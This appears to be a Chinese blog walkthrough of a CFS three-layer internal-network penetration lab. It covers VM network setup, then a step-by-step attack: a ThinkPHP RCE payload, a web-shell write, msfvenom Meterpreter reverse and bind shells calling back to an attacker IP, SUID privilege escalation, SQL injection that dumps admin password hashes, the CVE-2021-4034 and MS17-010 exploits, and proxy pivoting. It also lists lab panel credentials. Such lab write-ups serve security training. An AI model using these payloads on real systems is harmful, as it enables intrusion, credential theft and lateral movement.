CFS 三层内网环境搭建及渗透
创始人
2025-05-28 02:37:50

0x00 cfs三层内网基本环境介绍及配置

hacker主机能ping通centos,centos能ping通unbuntun,,unbtun能ping通win7,内网centos,unbuntu有两张网卡,在vmare通过虚拟网络编辑器新建三张网卡,关闭dhcp服务,一定要注意取消将主机虚拟适配器连接到此网络,新增加网络适配器,选择对应的网卡

新建网卡 vmare2,vmare3

centos网卡选择 vamre2 vmare8(nat)

手动配置ip 192.168.10.20

cd /etc/sysconfig/network-scripts/
cp ifcfg-ens33 ifcfg-ens37

需要改的地方

BOOTPROTO=static                   换成静态           
HWADDR                             mac地址删掉 
DNS1,GATEWAY                      dns,网关不需要
IPADDR=192.168.10.10              ip地址
DEVICE=ens37                      设备名改成ens37,ifconfig后的网卡名 
NETAMSK=255.255.255.0             加网关

配置好的图:

systemctl restart network     #重启网络,可能会失败,但ifconfig后只要有ip即可

配置成功

ubuntu网卡选择 vmare 2 vmare3

手动配置ip 192.168.10.30 192.168.20.10

vim /etc/network/interfaces
#添加以下内容
auto eth33
iface eth33 inet static
address 192.168.10.20
netmask 255.255.255.0
auto eth38
iface eth38 inet static
address 192.168.20.10
netmask 255.255.255.0
#重启网络
systemctl restart networking

win7 网卡选择vmare3

手动配置ip 192.168.20.20

centos的宝塔面版配一下

http://192.168.85.143:8888/a768f109/
用户名: eaj3yhsl
密码: 41bb8fee

测试环境是否配置成功

kali

centos

0x01攻击centos

1.扫描网段,发现存活ip 192.168.85.143

nmap 192.168.85.0/24

2.访问网站:192.168.85.143

看到这首现想到thinkphp v5的漏洞,搜索相关exp

3.payload: 执行whoami命令

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

4.方法一:

尝试写一句话木马

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo '' > 2.php

访问一下是否写入成功,post传入1=phpinfo();

php是7版本的,有些菜刀可能不支持,使用蚁剑连接

上传msf木马进行获取meterpreter

 #生成木马时需要看操作系统和操作系统位数
msfvenom -p linux/x64/meterpreter/reverse_tcp  lhost=192.168.85.129 lport=4444 -f elf -o 1.elf
#使用蚁剑上传木马,给予执行权限,并运行
chmod u+x 1.elf
./1.elf
#启动msf ,开启监听,监听端口默认4444,和生成的木马端口不同时,需要修改成生成的木马端口
msfconsole
use multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.85.129
run

成功返回

4.方法二:

msf直接搜索thinkphp相关漏洞

search thinkphp
use 0
set lhost 192.168.85.129
set lport 4455
set rhosts 192.168.85.143
set rport 80
run

成功返回:

5.提权:

上传漏洞linux-exploit-suggeter探测脚本,说是有脏牛(cve2016-5195),失败,sudo(cve2021-3156)

内核失败

下一个尝试suid提权

手动探测:

python -c "import pty;pty.spawn('/bin/bash')"  #进入交互式shell
#手动探测
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;

发现find

利用find提权:

find docw -exec /bin/bash -p \;

成功提权:

0x02 攻击ubuntu

在已经取得了centos的权限时,进行信息搜集,发现192.168.10.0网段,因为没有路由,kali(攻击机)是无法访问192.168.10.0网段的,如果只是msf用的话只需要添加路由即可,但是如果想用其他工具,比如说nmap,就需要进行设置代理了

1.添加路由

run post/multi/manage/autoroute

msf是充当代理服务器

利用全局代理工具将流量转发至centos,centos在转发给内网192.168.10.0网段的其他主机

Linux全局代理工具: proxychains

Windows全局代理工具: scokscap64,proxifier

socks代理隧道是不能通过icmp流量的

2.配置本地全局代理设置,默认是scoks4,本地的端口9050,注意用socks4很不稳定,很容易掉线

代理设置在最后面

vim /etc/proxychains4.conf

改成

scoks5 127.0.0.1 9050

3.开启代理服务器

background
use auxiliary/server/socks_proxy
set srvport 9050
set version 5              #scoks 4要设置为4a
run

3.信息搜集

因为知道是一个网站所以只扫了80

proxychains nmap -sT -T4 192.168.10.0/24-p80

从图上可以看出192.168.10.30是存活的开放了80端口,其他主机虽然说是存活的,但是服务都关闭了,所以应该是没有存活的

在使用各种工具时,加上proxychains就是代表流量经过这里转发

4.访问网站

proxychains firefox http://192.168.10.30

发现cms但是没找到相关漏洞,只是说有sql注入

发现信息提示

5.sql注入

index.php?r=vul&keyword=1' andupdatexml(1,concat(0x7e,(select database()),0x7e),1)-- +

得到数据库名:bagecms

index.php?r=vul&keyword=1%27%20and%20updatexml(1,concat(0x7e,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27bagecms%27),0x7e),1)--%20+
/index.php?r=vul&keyword=1%27%20and%20updatexml(1,concat(0x7e,(select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27bagecms%27%20limit%202,1),0x7e),1)--%20+
/index.php?r=vul&keyword=1%27%20and%20updatexml(1,concat(0x7e,(select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27bagecms%27%20limit%203,1),0x7e),1)--%20+

得到的表名:bage_ad,bage_admin, bage_admin_group,bage_admin_logger

/index.php?r=vul&keyword=1%27%20and%20updatexml(1,concat(0x7e,(select%20column_name%20from%20information_schema.columns%20where%20table_schema=%27bagecms%27%20and%20table_name=%27bage_admin%27%20%20limit%201,1),0x7e),1)--%20+
/index.php?r=vul&keyword=1%27%20and%20updatexml(1,concat(0x7e,(select%20column_name%20from%20information_schema.columns%20where%20table_schema=%27bagecms%27%20and%20table_name=%27bage_admin%27%20%20limit%202,1),0x7e),1)--%20+

等到字段名:username,password

/index.php?r=vul&keyword=1%27%20and%20updatexml(1,concat(0x7e,(select%20username%20from%20bagecms.bage_admin%20limit%200,1),0x7e),1)--%20+
/index.php?r=vul&keyword=1%27%20and%20updatexml(1,concat(0x7e,(select%20password%20from%20bagecms.bage_admin%20limit%200,1),0x7e),1)--%20+
username :admin
password : 46f94c8de14fb36680850768ff1b7f2
密码解密 : 123qwe

6.扫目录,找后台

http://192.168.10.30/robots.txt

后台登录地址

http://192.168.10.30/ index.php?r=admini/public/login

7.改源码连一户话木马

8.蚁剑设置代理

9.msf生成木马,上线

 uname -a   #生成64位的木马

为什么生成正向连接的木马,因为对方不能和我们建立连接,而我们可以通过socks代理的隧道和对方进行通信

msfvenom -p linux/x64/meterpreter/bind_tcp lport=4455 -f elf -o 2.elf
proxychains msfconsole    #或在添加了路由的那个msf中,就不需要启动了msfconsole
set payload  linux/x64/meterpreter/bind_tcp
set lport 4455
set rhost 192.168.10.30
run

10.用蚁剑上传漏洞探测脚本,进行提权

发现cve-2021-3156,尝试使用exp进行提权

发现报错,大概率存在,在看一下版本

版本存在:

sudo: 1.8.2 - 1.8.31p2

sudo: 1.9.0 - 1.9.5p1

提权失败

尝试进行下一个Polkit(CVE-2021-4034),可能存在

进行编译运行

git clone https://github.com/berdav/CVE-2021-4034.git  #不能下载时,就自己复制链接下载,在传到目标靶机
cd CVE-2021-4034/                                     
make                  #编译                         
./cve-2021-4034       #运行

提权成功:

0x03 攻击win7

1.在ubuntu msf上线后添加路由

run post/multi/manage/autoroute

2.配置本地全局代理设置,默认是scoks4,本地的端口9050,注意用socks4很不稳定,很容易掉线

代理设置在最后面

vim /etc/proxychains4.conf

改成

scoks5 127.0.0.1 1080

这里应该也是可以访问192.168.10.30,不是直接到socks服务器上的,需要经过第一台的socks代理服务器(192.168.85.0网段到192.168.10.0网段的隧道),这样配完了就是一个逻辑上长的socks的隧道,因为访问192.168.20.20经过192.168.10.30的隧道。socks服务器是msf充当的,proxychains和sockscap只是全局代理工具

当代理端口为1080:

但代理端口为9050:

3.开启代理服务器

这里的socks4,还是socks5,代理一直掉线,不稳定

background
use auxiliary/server/socks_proxy
set srvport 1080
set version 5              #scoks 4要设置为4a
run

4.信息搜集

proxychains nmap -sT -T4 192.168.20.15-20 -p80,445,3389,3306

发现存活ip,并开放了445,试一下ms17-010(永恒之蓝)

5.使用msf使用ms17-010进行攻击

proxychains msfconsole  
search ms17-010
use 1
set payload windows/x64/meterpreter/bind_tcp
set rhost 192.168.20.20
set rhosts 192.168.20.20
run

上线msf并成功提权

参考文章:

CFS三层内网环境 渗透流程_baynk的博客-CSDN博客

CFS三层内网靶场渗透记录【详细指南】 - FreeBuf网络安全行业门户

相关内容

热门资讯

【Android Servic... IntentService 简单使用 /*** Create by SunnyDay /03/13 ...
设计模式-责任链模式 责任链模式属于行为模式Gof定义 使多个对象都有机会处理请求,从而避免请求的发送者和接...
一文带你彻底理解进程与线程(包... 进程与线程 进程 何为进程 进程通俗的说就是我们计算机中一个个正在运行中的程序的抽象出来的概念&#x...
亚马逊国际获得AMAZON商品... item_get-获得AMAZON商品详情item_search-按关键字搜索商品公共参数名称类型必...
redis之动态字符串sds的... 目录 引言: C语言: sds SDS的实现  C语言与SDS对比 1࿰...
【PMP第六章实战】项目进度管... 问题一 如果项目经理对各需求所需的人天不确定,是否需要让懂技术的来一起制定࿱...
「SAP」为什么2023年后A... 💂作者简介: THUNDER王,一名热爱财税和SAP A...
高盛前银行家莱斯纳将因一马发展... 在承认参与史上最大金融丑闻之一近七年后,高盛集团前银行家蒂姆・莱斯纳(Tim Leissner)将于...
拼多多净利润缩水,结果我发现不... 曾经一发财报,就让市场疯狂,股价暴涨,让人忍不住感叹 “ 还有谁能阻挡它” 的拼多多。 却在昨天发布...
蓝牙耳机和运动耳机哪个好、运动... 如果你要买一款运动耳塞,那么你需要注意一些细节,一款好的运动耳塞...
Nginx+Tomcat负载均... 文章目录一.Nginx负载均衡实现原理1、 反向代理原理2、反向代理的概念3、反向代理的优势4、Ng...
STM32之bxCAN CAN基础知识介绍CAN介绍什么是CANCAN(Controller Area Net...
3.15日报 一、WebSocket客户端 websocket允许通过JavaScript建立与远程服务器的连接&...
Web文件下载总结 文章目录location.href 或 window.open标签 或 点击事件a标签的downlo...
VS2017使用Eigen库 在 C++ 中,向量类型通常由库提供。C++ 标准库中...
MySQL-->上篇 一、引言 1.1 现有的数据存储方式有哪些? Java程序存储数据(...
西安石油大学C语言期末真题实战 很简单的一道程序阅读题,p=a’默认为a【0】,接下来会进行3次...
Mybatis框架结构 在学习mybatis之前,首先回忆传统jdbc如何访问数据库。传统jdbc 访问数据库...
“诅咒领导猝死”正在收割第一波... 出品 | 虎嗅青年文化组作者 | 渣渣郡本文首发于虎嗅年轻内容公众号“那個NG”(ID:huxiu4...
消息中间件-1 1、什么是消息中间件? 消息中间件属于分布式系统中一个子系统,主要关注于...
【netron】模型可视化工具... 1、简介 在实际的项目中,经常会遇到各种网络模型,需要我们快速去了解网络...
嵌入式软件开发之Linux下C... 目录 前沿 Hello World! 编写代码 编译代码 GCC编译器  gcc 命...
海盗分金问题的一种解答 欢迎对非前言部分感兴趣的同学与我讨论前言人的一生充满了意外 真的意外有时候我也受某些同学的启发,觉得...
2B产品中心思考 一.背景对于产品中心的一些思考,做下沉淀。对于电商类业务产品是核心基架,...
海外seo如何优化? 海外SEO如何优化?以下是一些常见问题及其解答。 什么是谷歌SEO或Google优化&...
IBMMQ linux版命令创... 1. 队列、通道介绍 1.1 本地队列         本地队列又分为普通本地队列和传输队列...
即时零售点燃白酒市场,美团61... 临近端午假期,不温不火的白酒市场却在线上燃起战火。 图片来源:图虫创意 “没想到618别的还没买,...
信息时代的必修课:信息增量(利... 文章目录 引言I 利用相关性进行压缩编码1.1 增量编码的案例11.2 增量编码的案例21.3 增量...
上海动力设备展:展会设计与搭建... 上海动力设备展作为动力设备发电机组领域极具影响力的品牌展会,是企业展示实力、推广产品、交流技术的理想...
28日中证500指数期货下跌0... 新浪期货 根据交易所数据,截至5月28日收盘主力合约中证500指数期货2506,涨跌-0.26%,成...